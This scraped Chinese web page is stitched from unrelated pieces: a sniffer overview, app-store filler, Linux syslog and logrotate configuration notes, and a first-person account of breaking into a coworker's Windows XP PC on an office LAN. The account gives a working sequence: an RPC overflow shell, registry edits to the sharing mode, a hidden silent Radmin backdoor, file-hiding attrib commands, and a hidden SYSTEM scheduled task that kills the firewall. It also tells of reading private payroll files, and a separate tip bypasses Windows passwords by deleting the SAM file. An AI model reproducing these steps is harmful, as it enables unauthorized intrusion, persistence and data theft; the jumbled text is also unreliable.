网络高手请进

络安全如何使用Sniffer抓包/使用方法

随着Internet及电子商务的日益普及,Internet的安全也越来越受到重视。而在Internet安全隐患中扮演重要角色的是Sniffer和Scanner,本文将介绍Sniffer以及如何阻止sniffer。

大多数的黑客仅仅为了探测内部网上的主机并取得控制权，只有那些"雄心勃勃"的黑客，为了控制整个网络才会安装特洛伊木马和后门程序，并清除记录。他们经常使用的手法是安装sniffer。

在内部网上，黑客要想迅速获得大量的账号（包括用户名和密码），最为有效的手段是使用 "sniffer" 程序。这种方法要求运行Sniffer 程序的主机和被监听的主机必须在同一个以太网段上，故而在外部主机上运行sniffer 是没有效果的。再者，必须以root的身份使用sniffer 程序，才能够监听到以太网段上的数据流。

黑客会使用各种方法，获得系统的控制权并留下再次侵入的后门，以保证sniffer能够执行。在Solaris 2.x平台上，sniffer 程序通常被安装在/usr/bin或/dev目录下。黑客还会巧妙的修改时间，使得sniffer程序看上去是和其它系统程序同时安装的。

大多数 "ethernet sniffer"程序在后台运行，将结果输出到某个记录文件中。黑客常常会修改ps程序，使得系统管理员很难发现运行的sniffer程序。

"ethernet sniffer"程序将系统的网络接口设定为混合模式。这样，它就可以监听到所有流经同一以太网网段的数据包，不管它的接受者或发送者是不是运行sniffer的主机。 程序将用户名、密码和其它黑客感兴趣的数据存入log文件。黑客会等待一段时间 ----- 比如一周后，再回到这里下载记录文件。

一、什么是sniffer

与电话电路不同，计算机网络是共享通讯通道的。共享意味着计算机能够接收到发送给其它计算机的信息。捕获在网络中传输的数据信息就称为sniffing（窃听）。

以太网是现在应用最广泛的计算机连网方式。以太网协议是在同一回路向所有主机发送数据包信息。数据包头包含有目标主机的正确地址。一般情况下只有具有该地址的主机会接受这个数 据包。如果一台主机能够接收所有数据包，而不理会数据包头内容，这种方式通常称为"混杂" 模式。

由于在一个普通的网络环境中，帐号和口令信息以明文方式在以太网中传输，一旦入侵者获 得其中一台主机的root权限，并将其置于混杂模式以窃听网络数据，从而有可能入侵网络中的所有计算机。

二、sniffer工作原理

通常在同一个网段的所有网络接口都有访问在物理媒体上传输的所有数据的能力，而每个网络接口都还应该有一个硬件地址，该硬件地址不同于网络中存在的其他网络接口的硬件地址，同时，每个网络至少还要一个广播地址。（代表所有的接口地址），在正常情况下，一个合法的网络接口应该只响应这样的两种数据帧：

1、帧的目标区域具有和本地网络接口相匹配的硬件地址。

2、帧的目标区域具有"广播地址"。

在接受到上面两种情况的数据包时，nc通过cpu产生一个硬件中断，该中断能引起操作系统注意，然后将帧中所包含的数据传送给系统进一步处理。

而sniffer就是一种能将本地nc状态设成（promiscuous）状态的软件，当nc处于这种"混杂"方式时，该nc具备"广播地址"，它对所有遭遇到的每一个帧都产生一个硬件中断以便提醒操作系统处理流经该物理媒体上的每一个报文包。（绝大多数的nc具备置成promiscuous方式的能力）

可见，sniffer工作在网络环境中的底层，它会拦截所有的正在网络上传送的数据，并且通过相应的软件处理，可以实时分析这些数据的内容，进而分析所处的网络状态和整体布局。值得注意的是：sniffer是极其安静的，它是一种消极的安全攻击。

通常sniffer所要关心的内容可以分成这样几类：

1、口令：

我想这是绝大多数非法使用sniffer的理由，sniffer可以记录到明文传送的userid和passwd.就算你在网络传送过程中使用了加密的数据，sniffer记录的数据一样有可能使入侵者在家里边吃肉串边想办法算出你的算法。

2、金融帐号：

许多用户很放心在网上使用自己的信用卡或现金帐号，然而sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、帐号和pin。

3、偷窥机密或敏感的信息数据：

通过拦截数据包，入侵者可以很方便记录别人之间敏感的信息传送，或者干脆拦截整个的email会话过程。

4、窥探低级的协议信息：

这是很可怕的事，我认为，通过对底层的信息协议记录，比如记录两台主机之间的网络接口地址、远程网络接口ip地址、ip路由信息和tcp连接的字节顺序号码等。这些信息由非法入侵的人掌握后将对网络安全构成极大的危害，通常有人用sniffer收集这些信息只有一个原因：他正在进行一次欺诈，（通常的ip地址欺诈就要求你准确插入tcp连接的字节顺序号,这将在以后整理的文章中指出）如果某人很关心这个问题，那么sniffer对他来说只是前奏，今后的问题要大条得多。（对于高级的hacker而言，我想这是使用sniffer的唯一理由吧）。

三、哪里可以得到sniffer

Sniffer是黑客们最常用的入侵手段之一。你可以在经过允许的网络中运行sniffer，了解它是如何有效地危及本地机器安全。

Sniffer可以是硬件，也可以是软件。现在品种最多,应用最广的是软件Sniffer, 绝大多数黑客们用的也是软件Sniffer。

以下是一些也被广泛用于调试网络故障的sniffer工具：

商用sniffer：

1 Network General.

Network General开发了多种产品。最重要的是Expert Sniffer，它不仅仅可以sniff，还能够通过高性能的专门系统发送/接收数据包，帮助诊断故障。还有一个增强产品"Distrbuted SnifferSystem"可以将UNIX工作站作为sniffer控制台，而将snifferagents（代理）分布到远程主机上。

2 Microsoft's Net Monitor

对于某些商业站点，可能同时需要运行多种协议--NetBEUI、IPX/SPX、TCP/IP、802.3和SNA等。这时很难找到一种sniffer帮助解决网络问题，因为许多sniffer往往将某些正确的协议数据包当成了错误数据包。Microsoft的Net Monitor（以前叫Bloodhound）可以解决这个难题。它能够正确区分诸如Netware控制数据包、NTNetBios名字服务广播等独特的数据包。（etherfind只会将这些数据包标识为类型0000的广播数据包。）这个工具运行在MS Windows平台上。它甚至能够按MAC地址（或主机名）进行网络统计和会话信息监视。只需简单地单击某个会话即可获得tcpdump标准的输出。过滤器设置也是最为简单的，只要在一个对话框中单击需要监视的主机即可。

免费软件sniffer

1 Sniffit由Lawrence Berkeley 实验室开发，运行于Solaris、SGI和Linux等平台。可以选择源、目标地址或地址集合，还可以选择监听的端口、协议和网络接口等。这个SNIFFER默认状态下只接受最先的400个字节的信息包，这对于一次登陆会话进程刚刚好。

2 SNORT：这个SNIFFER有很多选项供你使用并可移植性强，可以记录一些连接信息，用来跟踪一些网络活动。

3 TCPDUMP：这个SNIFFER很有名，linux,FREEBSD还搭带在系统上，是一个被很多UNIX高手认为是一个专业的网 络管理工具，记得以前TsutomuShimomura（应该叫下村侵吧）就是使用他自己修改过的TCPDUMP版本来记录了KEVINMITNICK攻击他系统的记录，后来就配合FBI抓住了KEVINMITNICK，后来他写了一文：使用这些LOG记录描述了那次的攻击，How Mitnick hacked Tsutomu Shimomura with an IP sequence attack

(http://www.attrition.org/securit ... niffer/shimomur.txt)

4 ADMsniff:这是非常有名的ADM黑客集团写的一个SNIFFER程序。

5 linsniffer:这是一个专门设计杂一LINUX平台上的SNIFFER。

6 Esniffer:这个也是一个比较有名的SNIFFER程序。

7 Solsniffer:这是个Solarissniffer，主要是修改了SunSniff专门用来可以方便的在Solair平台上编译。

8 Ethereal是一基于GTK＋的一个图形化Sniffer。

9 Gobbler(for MS－DOS＆Win95)、Netman、NitWit、Ethload...等等。

--------------------------------------------------------------------------------

手机上ADM软件是怎么用的？

APP指的是智能手机的第三方应用程序。比较著名的应用商店有苹果的App Store，谷歌的Google Play Store，诺基亚的Ovi store，还有黑莓用户的BlackBerry App World，微软的Marketplace等。最近两年，app分发成为各大互联网巨头的新“行当”，在手机厂商和专业应用下载平台的夹击下，不但没有被挤成“夹心饼干”，反而成了可口的“驴肉火烧”。以百度手机助手为例，其打破传统应用分发的下载套路，从娱乐和社交的角度去“再造”应用分发平台，开创了一个值得圈点的应用市场新模式，也让我们看到了APP快消化品牌运作的趋势.

应用：用初期以媒体、游戏、新闻、书籍的移动应用为主，主要运用于商务。他能直接将成功的网站内容和功能移植到应用，如淘宝。作为补充角色，他是国外一些大公司普遍采用的模式。如美国的报纸杂志在网站收不到钱，缺少使用传统阅读习惯的体验，而在智能手机或iPad的随身方便性及直观触控操作让使用者愿意付费。

在忘记用户密码（是adm用户）时要如何才能进入系统？

Winnt\System32\Config下SAM文件中，SAM文件即账号密码数据库文件。用启动盘进入DOS删除此文件就可以了

如何查看linux系统下的各种日志文件 linux 系统日志的分析大全

日志文件详细地记录了系统每天发生的各种各样的事件。用户可以通过日志文件检查错误产生的原因，或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是：审核和监测。

Linux系统的日志主要分为两种类型：

1．进程所属日志

由用户进程或其他系统服务进程自行生成的日志，比如服务器上的access_log与error_log日志文件。

2．syslog消息

系统syslog记录的日志，任何希望记录日志的系统进程或者用户进程都可以给调用syslog来记录日志。

日志系统可以划分为三个子系统：

1． 连接时间日志--由多个程序执行，把纪录写入到/var/log/wtmp和/var/run/utmp，login等程序更新wtmp和utmp文件，使系统管理员能够跟踪谁在何时登录到系统。

2． 进程统计--由系统内核执行。当一个进程终止时，为每个进程往进程统计文件（pacct或acct）中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。

3． 错误日志--由syslogd（8）执行。各种系统守护进程、用户程序和内核通过syslog（3）向文件/var/log/messages报告值得注意的事件。

2．察看日志文件

Linux系统所有的日志文件都在/var/log下，且必须有root权限才能察看。

日志文件其实是纯文本的文件，每一行就是一个消息。察看方式有很多。

1． cat命令。日志文件总是很大的，因为从第一次启动Linux开始，消息都累积在日志文件中。如果这个文件不只一页，那么就会因为显示滚动得太快看不清文件的内容。

2． 文本编辑器。最好也不要用文本编辑器打开日志文件，这是因为一方面很耗费内存，另一方面不允许随意改动日志文件。

3．用more或less那样的分页显示程序。

4．用grep查找特定的消息。

每一行表示一个消息，而且都由四个域的固定格式组成：

n 时间标签（timestamp），表示消息发出的日期和时间

n 主机名（hostname）（在我们的例子中主机名为escher），表示生成消息的计算机的名字。如果只有一台计算机，主机名就可能没有必要了。但是，如果在网络环境中使用syslog，那么就可能要把不同主机的消息发送到一台服务器上集中处理。

n 生成消息的子系统的名字。可以是"kernel"，表示消息来自内核，或者是进程的名字，表示发出消息的程序的名字。在方括号里的是进程的PID。

n 消息（message），剩下的部分就是消息的内容。

举例：

在[root@localhost root]# 提示符下输入：tail /var/log/messages

Jan 05 21:55:51 localhost last message repeated 3 times

Jan 05 21:55:51 localhost kernel: [drm] AGP 0.99 on Intel i810 @ 0xf0000000 128M

B

Jan 05 21:55:51 localhost kernel: [drm] Initialized i830 1.3.2 20021108 on minor

Jan 05 21:55:51 localhost kernel: mtrr: base(0xf0000000) is not aligned on a siz

e(0x12c000) boundary

Jan 05 21:56:35 localhost 1月 28 21:56:35 gdm(pam_unix)[4079]: session opened f

or user root by (uid=0)

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 正在启动（版本 2.

2.0），pid 4162 用户"root"

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re

adonly:/etc/gconf/gconf.xml.mandatory"指向位于 0 的只读配置源

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re

adwrite:/root/.gconf"指向位于 1 的可写入配置源

Jan 05 21:56:39 localhost 1月 28 21:56:39 gconfd (root-4162): 解析的地址"xml:re

adonly:/etc/gconf/gconf.xml.defaults"指向位于 2 的只读配置源

Jan 05 21:58:20 localhost kernel: MSDOS FS: IO charset cp936

值得注意的是，与连接时间日志不同，进程统计子系统默认不激活，它必须启动。在Linux

系统中启动进程统计使用accton命令，必须用root身份来运行。accton命令的形式为：accton

file，file必须事先存在。先使用touch命令创建pacct文件：touch

/var/log/pacct，然后运行accton：accton

/var/log/pacct。一旦accton被激活，就可以使用lastcomm命令监测系统中任何时候执行的命令。若要关闭统计，可以使用不带任何

参数的accton命令。

3．日志系统工作原理及配置

3.1 syslog

它同closelog, openlog共同给system logger发送消息。

Linux内核由很多子系统组成，包括网络、文件访问、内存管理等。子系统需要给用户传送一些消息，这些消息内容包括消息的来源及其重要性等。所有的子系统都要把消息送到一个可以维护的公用消息区。于是，就有了一个叫Syslog的程序。

这个程序负责接收消息（比如：系统核心和许多系统程序产生的错误信息、警告信息和其他信息，每个信息都包括重要级），并把消息分发到合适的地方。通常情况

下，所有的消息都被记录到特定的文件——日志文件中（通常是/var/adm或/var/log目录下的messages文件），特别重要的消息也会在用

户终端窗口上显示出来。

syslog工具有两个重要文件：syslogd和syslog.Conf

它能接受访问系统的日志信息并且根据 "/etc/syslog.conf" 配置文件中的指令处理这些信息。守护进程和内核提供了访问系统的日志信息。因此，任何希望生成日志信息的程序都可以向 syslog 接口呼叫生成该信息。

3.2 syslogd守护进程

　就象其它复杂的操作系统那样，Linux也是由很多不同的子系统组成的。有些叫做daemon的程序一直在后台运行（daemon：守护神之意。也就是

说，他们"默默无闻"，不需要和用户交互），处理一些象打印、发送邮件、建立Internet连接，等等日常工作。每一个子系统发出日志消息的时候都会给

消息指定一个类型。一个消息分成两个部分："设备（facility）"和"级别(level)"。"设备"标识发出消息的子系统，可以把同一类型的消息组合在一起，"级别"表示消息的重要性，其范围从debug（最不重要）到emerg（最重要），facility和level组合起来称为priority。（详细解释参照5.3）

/usr/include/sys/syslog.h中对此有相关的定义。

用户看不到daemon程序，因为它们没有窗口和用户界面。但是，这些程序有时候也要给用户传递一些信息。为了实现这个目的，就需要一个特殊的机制。syslogd就是daemon的一个很好的例子，它在后台运行并且把消息从日志区转移到日志文件中去。

函数接口

#include

void openlog( char * , int , int )

其中，可以是以下值的OR组合：

LOG_CONS : 如果消息无法送到syslogd，直接输出到系统console。

LOG_NDELAY : 立即打开到syslogd的连接，默认连接是在第一次写入讯息时才打开的。

LOG_PERROR : 将消息也同时送到stderr 上

LOG_PID : 将PID记录到每个消息中

void syslog( int , char * )

其中，是facility和level的OR组合

void closelog( void )

一般只需要用syslog()函数，其他函数可以不用。

3.3 syslog.conf

这是一个非常重要的文件。位于"/etc/"目录下。通知 syslogd 如何根据设备和信息重要级别来报告信息。

该文件使用下面的形式：

facility.level action

syslog.conf 的第一列facility.level用来指定日志功能和日志级别，中间用.隔开，可以使用*来匹配

所有的日志功能和日志级别。第二列action是消息的分发目标。

空白行和以#开头的行是注释，可以忽略。

Facility.level 字段也被称做选择域（seletor）。

n facility 指定 syslog 功能，主要包括以下这些：

auth 由 pam_pwdb 报告的认证活动。

authpriv 包括特权信息如用户名在内的认证活动

cron 与 cron 和 at 有关的信息。

daemon 与 inetd 守护进程有关的信息。

kern 内核信息，首先通过 klogd 传递。

lpr 与打印服务有关的信息。

mail 与电子邮件有关的信息

mark syslog 内部功能用于生成时间戳

news 来自新闻服务器的信息

syslog 由 syslog 生成的信息

user 由用户程序生成的信息

uucp 由 uucp 生成的信息

local0----local7 与自定义程序使用，例如使用 local5 做为 ssh 功能

* 通配符代表除了 mark 以外的所有功能

level 级别，决定讯息的重要性。

与每个功能对应的优先级是按一定顺序排列的，emerg 是最高级，其次是 alert，依次类推。缺省时，在 /etc/syslog.conf 记录中指定的级别为该级别和更高级别。如果希望使用确定的级别可以使用两个运算符号！(不等)和=。

例如：user.=info 表示告知 syslog 接受所有在 info 级别上的 user 功能信息。

n 以下的等级重要性逐次递减:

emerg 该系统不可用

alert 需要立即被修改的条件

crit 阻止某些工具或子系统功能实现的错误条件

err 阻止工具或某些子系统部分功能实现的错误条件

warning 预警信息

notice 具有重要性的普通条件

info 提供信息的消息

debug 不包含函数条件或问题的其他信息

none 没有重要级，通常用于排错

* 所有级别，除了none

n action 字段为动作域，所表示的活动具有许多灵活性，特别是，可以使用名称管道的作用是可以使 syslogd 生成后处理信息。

syslog 主要支持以下活动：

file 将消息追加到指定的文件尾

terminal 或 print 完全的串行或并行设备标志符

@host 远程的日志服务器

username 将消息写到指定的用户

named pipe 指定使用 mkfifo 命令来创建的 FIFO 文件的绝对路径。

* 将消息写到所有的用户

选择域指明消息的类型和优先级；动作域指明syslogd接收到一个与选择标准相匹配的消息时所执行的动作。每个选项是由设备和优先级组成。当指明一个优先级时，syslogd将纪录一个拥有相同或更高优先级的消息。比如如果指明"crit"，则所有标为crit、alert和emerg的消息将被纪录。每行的行动域指明当选择域选择了一个给定消息后应该把他发送到什么地方。

以下是一个实际站点的配置（syslog.conf）文件：

# Store critical stuff in critical

#

*.=crit;kern.none /var/adm/critical

这个将把所有信息以优先权的crit保存在/var/adm/critical文件中，除了一些内核信息

# Kernel messages are first, stored in the kernel

# file, critical messages and higher ones also go

# to another host and to the console

#

kern.* /var/adm/kernel

kern.crit @finlandia

kern.crit /dev/console

kern.info;kern.!err /var/adm/kernel-info

第一条代码指引一些内核设备访问文件/var/adm/kernel的信息。

第二条代码直接引导所有拥有crit和更高优先权的内核信息访问远程主机。如果它们也存储在远程主机上，仍旧可以试着找到毁坏的原因。

第四行说明syslogd 保存了所有拥有info 到warning优先级的内核信息在/var/adm/kernel-info文件夹下。所有err和更高优先级的被排除在外。

# The tcp wrapper loggs with mail.info, we display

# all the connections on tty12

#

mail.=info /dev/tty12

这个引导所有使用mail.info (in source LOG_MAIL | LOG_INFO)的信息到/dev/tty12下，第12

个控制台。例如tcpwrapper

tcpd

(8)载缺省时使用这个

# Store all mail concerning stuff in a file

mail.*;mail.!=info /var/adm/mail

模式匹配了所有具有mail功能的信息，除了拥有info优先级的。他们将被保存在文件/var/adm/mail中

# Log all mail.info and news.info messages to info

#

mail,news.=info /var/adm/info

提取所有具有mail.info 或news.info 功能优先级的信息存储在文件/var/adm/info中

# Log info and notice messages to messages file

#

*.=info;*.=notice;\

mail.none /var/log/messages

使所有syslogd日志中具有info 或notice功能的信息存储在文件/var/log/messages中，除了所有mail功能的信息

# Log info messages to messages file

#

*.=info;\

mail,news.none /var/log/messages

这个声明使syslogd日志中所有具有info优先权的信息存储在/var/log/messages文件中。但是一些有mail 或news功能的信息不能被存储。

# Emergency messages will be displayed using wall

#

*.=emerg *

这行代码告诉syslogd写所有紧急信息到所有当前登陆用户日志中。这个将被实现

# Messages of the priority alert will be directed

# to the operator

#

*.alert root,joey

*.* @finlandia

这个代码指引所有具有alert 或更高级权限的信息到终端操作。

第二行代码引导所有信息到叫做finlandia的远程主机。这个代码非常有用，特别是在所有syslog信息将被保存到一台机器上的群集计算机。

3.4 klogd 守护进程

klog是一个从UNIX内核接受消息的设备

klogd

守护进程获得并记录 Linux 内核信息。通常，syslogd 会记录 klogd

传来的所有信息。也就是说，klogd会读取内核信息，并转发到syslogd进程。然而，如果调用带有 -f filename 变量的 klogd

时，klogd 就在 filename 中记录所有信息，而不是传给 syslogd。当指定另外一个文件进行日志记录时，klogd

就向该文件中写入所有级别或优先权。Klogd 中没有和 /etc/syslog.conf 类似的配置文件。使用 klogd 而避免使用

syslogd 的好处在于可以查找大量错误。

总结

其中，箭头代表发送消息给目标进程或者将信息写入目标文件。

图1 Linux日志系统

日志管理及日志保护

logrotate程序用来帮助用户管理日志文件，它以自己的守护进程工作。logrotate周期性地旋转日志文件，可以周期性地把每个日志文件重命名

成一个备份名字，然后让它的守护进程开始使用一个日志文件的新的拷贝。在/var/log/下产生如maillog、maillog.1、

maillog.2、boot.log.1、boot.log.2之类的文件。它由一个配置文件驱动，该文件是

/etc/logroatate.conf。

以下是logroatate.conf文件例子：

# see "man logrotate" for details

# rotate log files weekly

weekly

#以7天为一个周期

# keep 4 weeks worth of backlogs

rotate 4

#每隔4周备份日志文件

# send errors to root

errors root

#发生错误向root报告

# create new (empty) log files after rotating old ones

create

#转完旧的日志文件就创建新的日志文件

# uncomment this if you want your log files compressed

#compress

#指定是否压缩日志文件

# RPM packages drop log rotation information into this directory

include /etc/logrotate.d

# no packages own lastlog or wtmp -- we'll rotate them here

/var/log/wtmp {

monthly

create 0664 root utmp

rotate 1

}

# system-specific logs may be configured here

在网络应用中，有一种保护日志的方式，在网络中设定一台秘密的syslog主机，把这台主机的网卡设为混杂模式，用来监听子网内所有的syslog包，这

样把所有需要传送日志的主机配置为向一台不存在的主机发送日志即可。这样即使黑客攻陷了目标主机，也无法通过syslog.conf文件找到备份日志的主

机，那只是一个不存在的主机。实际操作中还可以辅以交换机的配置，以确保syslog包可以被备份日志主机上的syslog进程接受到。比如把

syslog.conf中的传送日志主机设为

@192.168.0.13，但实际网络中不存在这个日志主机，实际可能是192.168.0.250或者其他主机正在接受syslog包。

局域网入侵命令有哪些？

先打开命令提示符，用 ping 命令去ping 它，Reply from 192.168.16.4: bytes=32 time1ms TTL=128，说明对方没有防火墙，这样或许有可能入侵。

下一步，我使用了X-SCAN 3.2对它进行了详细扫描,对方电脑的操作系统是XP，大家知道XP系统是相当安全的，在一些黑客论坛讨论的关于入侵XP的话题也是比较多的，入侵这样的系统方法只有两种，一是采用钓鱼的方法，这是一种被动的方式让对方中木马来控制它。

第二种方法就是如果对方有比较严重的漏洞，如RPC溢出

先打开命令提示符，用 ping 命令去ping 它，Reply from 192.168.16.4: bytes=32 time1ms TTL=128，说明对方没有防火墙，这样或许有可能入侵。下一步，我使用了X-SCAN 3.2对它进行了详细扫描,对方电脑的操作系统是XP，大家知道XP系统是相当安全的，在一些黑客论坛讨论的关于入侵XP的话题也是比较多的，入侵这样的系统方法只有两种，一是采用钓鱼的方法，这是一种被动的方式让对方中木马来控制它。第二种方法就是如果对方有比较严重的漏洞，如RPC溢出。这样的话，用溢出程序溢出它，然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞，下一步就要找溢出程序，这让我忙活了好一阵时间，因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了，反正有好几个。最后找到了一个溢出程序XP.EXE，这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。

得到了CMDSHELL，我该怎样给它上传控制程序呢？我想了一会儿，终于灵感来了，我和它在一个局域网，用共享上传最方便了。于是打开网上邻居，查看工作组计算机，找到这台电脑，双击，进不去，提示信息我记不清了，据我分析可能是对方这台电脑没有运行网络安装向导，因为是XP系统，所以要用共享传输文件，必须要运行这个向导不可，运行这个向导作用就是配置一个本地安全策略，你可以打开“控制面板—管理工具—本地安全策略”，展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从网络访问这台计算机”。我想对方的电脑中相应的这条策略里，肯定设置有GUEST这个用户的，这就是为什么我打不开它的共享的原因，因为共享访问默认是以这个GEUST用户登录的，因为它的安全设置不允许GUEST从网络访问，所以我才访问不了它的共享。因为XP 默认的共享模式是简单文件共享。这与WIN2000系统不同，如果是WIN2000系统，你在知道管理员密码的情况下，可以用命令net use IPipc$ "密码" /user:用户名 建立与对方的ipc$连接，随之而来的就是copy 木马程序 ipd$这样的命令上传木马了。XP就不能这样子了，你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。方法如下：在溢出获得的CMDSHELL下，键入命令：

echo Windows Registry Editor Version 5.00 c:123.reg

echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] c:123.reg

echo. c:123.reg

echo "forceguest"=dword:00000000 c:123.reg

regedit /e c:123.reg

等打完这几条命令后，对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意，echo Windows Registry Editor Version 5.00 c:123.reg这条命令是将Windows Registry Editor Version 5.00这几个字符保存到c:123.reg文件里。大家需要注意一下第一句的 和后面几句的这是有区别的，字符是覆盖式的，是追加式的，第三句的echo. c:123.reg命令是追加一个空白行，这句挺重要，如果不加这句是不能成功的，你可以随便打开一个注册表文件看一下，格式就是这样的，第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后，我就可以像操作2000系统一样去用ipc$控制了。下一步，上传控制程序。我选择的是RADMIN2.0的服务程序，有人问这个安装需要到图形界面下，我说不用这么费事，在CMDSHELL下一样可以安装。安装前我们需要先准备一下，首先生成一个REG文件，文件名：aaa.reg 内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]

"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服务端程序能够隐藏通知栏里的图标，我们都知道正常安装RADMIN服务端程序后，在通知栏里是有一个小图标的，我们要入侵人家，当然要把这个小图标去掉，不然是会被发现的。接着生成一个BAT文件，我命名为aaa.bat，内容如下：

r_server /install /silence

r_server.exe /port:2233 /pass:1 /save /silence

regedit.exe /s aaa.reg

net start r_server

这些命令是安装命令，设置连接端口为：2233 密码是：1 隐藏安装界面的方式安装 然后就是将aaa.reg导入注册表，启动r_server服务。

准备工作作好后，就要上传文件了，一共需上传4个文件，aaa.reg aaa.bat r_server.exe admdll.dll 后两个文件是RADMIN安装目录下的，在安装了RADMIN2.0客户端后，安装目录里就有这两个文件。我先建立ipc$连接 net use 192.168.16.4ipc$ "" /user:administrator 提示：命令成功完成。接着:

copy r_server 192.168.1.4admin$system32

copy aaa.bat 192.168.1.4admin$system32

copy aaa.reg 192.168.1.4admin$system32

copy admdll.dll 192.168.1.4admin$system32

然后再进入溢出得到的CMDSHELL下键入：

attrib +s +h +r c:windowssystem32r_server.exe

attrib +s +h +r c:windowssystem32admdll.exe

attrib +s +h +r c:windowssystem32aaa.bat

attrib +s +h +r c:windowssystem32aaa.reg

这些命令是将这4个文件设置成系统隐藏只读文件，不容易被对方管理员发现。

下一步就是运行aaa.bat了，就这么简单，运行成功后，我用radmin2.0客户端设置了一下连接参数，端口改成2233，连接成功，密码是1，成功地看到了对方的屏幕。呵呵，成功了，从有入侵的想法到入侵成功进行控制，只用了短短的4天时间。

进入后看到对方电脑上正在玩QQ保皇游戏，不过我也犯了个错误我给它新建了个管理用户，原先是打算用于ipc$连接用的，可我上传RADMIN控制后忘记删掉了，我在溢出的CMDSHELL 下不小心键入了命令EXIT，结果对方电脑出现了倒计时关机的界面，我也没有及时处理掉，我当时要是用RADMIN的CMD功能，键入命令 shutdown -A就可以取消这个倒计时关机的界面，可当时我也没有及时处理，导致对方电脑重启了，重启后我估计对方管理员看到了我新建的用户了，后来我用RADMIN 远程查看时，也觉得这个新建用户太招摇了，用户名就是ip$ ,图标是个大红的花朵。

下午的时候我发现那台电脑的管理员请了位高手来助阵了，因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上，所以，那位高手先到我们办公室电脑上查看了一番没有发现问题后，他将原先安装的江民换成了卡巴了，我估计他认为攻击是来自互联网上，岂不知黑客就在他眼皮底下，嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴，原先的杀毒软件是诺顿，对WINDOWS也进行了更新，可这些作法都晚了，因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后，我的后门依然存在着，看来那位高手水平也不怎么样。我给它开放的ipc$功能，他也没发现。也许他只认为是一次简单的病毒攻击，而掉以轻心了，而不知他的一举一动都在我的监视之下。哈哈。。。

接下来的工作对我来说就比较简单了，给它开telnet服务器，开“远程桌面”这个我采用的是图形的方式进行操作的，中午下班后我等这台计算机管理员走后，用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件，有一些财务报表，工资表之类的东西，这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资，每月一万多块钱呢！！好黑啊。。。这么多，我工资只有区区几百块，真是太不公平了，愤愤不平中。。。。

后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了，我想对方的管理员也很感到意外， windows的补丁打上了，还装了强悍的卡巴，还是搞不定黑客！！哈哈，因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能，这样我无法连接它的电脑了。因为RADMIN是正向连接的，所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping 了一下这台电脑的IP，居然有返回。说明对方防火墙关闭了，我马上用RADMIN连接，居然成功。我晕。。。原来对方只开了防火墙，并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的，依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了，3389远程桌面也给关了，共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了，但是那个后门，他却没有发现，这就给我创造了第二次入侵的机会。他有政策我有对策，他可以开防火墙，我可以给他关掉，有人问要是再被管理员开启了防火墙，那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方，保证百病！哈哈。。。。

我的方法是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙，这样即使对方管理员打开防火墙也起不了什么作用。方法如下：先建一个批处理文件abc.bat，放在c:windowssystem32目录下,内容如下：

net stop sharedaccess

当然也可以附加点别的，比如说你想半小时杀除一遍天网防火墙，可以再加上下面的命令：

taskkill /IM rfw.exe /f

如果想使共享模式是高级共享模式，可以再加上下面的命令：

regedit /e c:windowssystem32abc.reg

当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

下面我说一下创建隐藏计划任务的方法：

在对方电脑的CMDSHELL下键入命令：

schtasks /create /tn "常驻" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"

这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务，这个计划任务每隔30分钟运行一次c: windowssystem32abc.bat,功能嘛，就是根据abc.bat里面的命令行决定了，可以说这个新发现是相当厉害的，利用的巧妙，功能可以相当强大。如果只有这样还不能达到隐藏的要求，你打开控制面板—任务计划，仍然可以发现它的存在。好的，下面说说隐藏它的方法。还是进入 CMDSHELL中。键入命令attrib +h c:windowstasks常驻.job回车后，你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失，实际是它还是存在的。你可以在CMDSHELL下键入命令：schtasks查看。这样不管对方管理员怎样修改设置，每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。

如何打开.adm格式文件

各种文件后缀名与打开方式

